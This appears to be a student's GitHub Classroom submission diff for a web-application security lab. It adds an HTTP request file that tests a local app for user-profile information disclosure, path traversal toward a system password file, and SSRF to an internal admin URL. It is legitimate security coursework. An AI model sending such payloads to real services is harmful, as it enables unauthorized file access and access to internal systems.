AdvancedJavaLabs · github-classroom · Apr 7, 2026 · Apr 7, 2026 · Apr 14, 2026
diff --git a/Findings.md b/Findings.md
diff --git a/README.md b/README.md
@@ -1,3 +1,4 @@
+[![Review Assignment Due Date](https://classroom.github.com/assets/deadline-readme-button-22041afd0340ce965d47ae6ef1cefeee28c7c493a6346c4f15d667ab976d596c.svg)](https://classroom.github.com/a/NSTTkgmb)
 # Лабораторная работа №4 — Анализ и тестирование безопасности веб-приложения
 
 ## Цель

diff --git a/img.png b/img.png
diff --git a/security.http b/security.http
@@ -0,0 +1,36 @@
+# Information Disclosure 1
+### register 1
+POST http://localhost:7000/register?userId=1&userName=aboba1
+Content-Type: application/json
+Accept: application/json
+
+### register 2
+POST http://localhost:7000/register?userId=2&userName=aboba2
+Content-Type: application/json
+Accept: application/json
+
+### profile 1
+GET http://localhost:7000/userProfile?userId=1
+Content-Type: application/json
+Accept: application/json
+
+### profile 2
+GET http://localhost:7000/userProfile?userId=2
+Content-Type: application/json
+Accept: application/json
+
+### Path traversal + DDos
+GET http://localhost:7000/exportReport?userId=1&filename=../../etc/password
+Accept: application/json
+
+### SSRF
+POST http://localhost:7000/notify?userId=1&callbackUrl=http://localhost:8080/admin
+Content-Type: application/json
+Accept: application/json
+
+
+
+
+
+
+
diff --git a/semgrep-report.sarif b/semgrep-report.sarif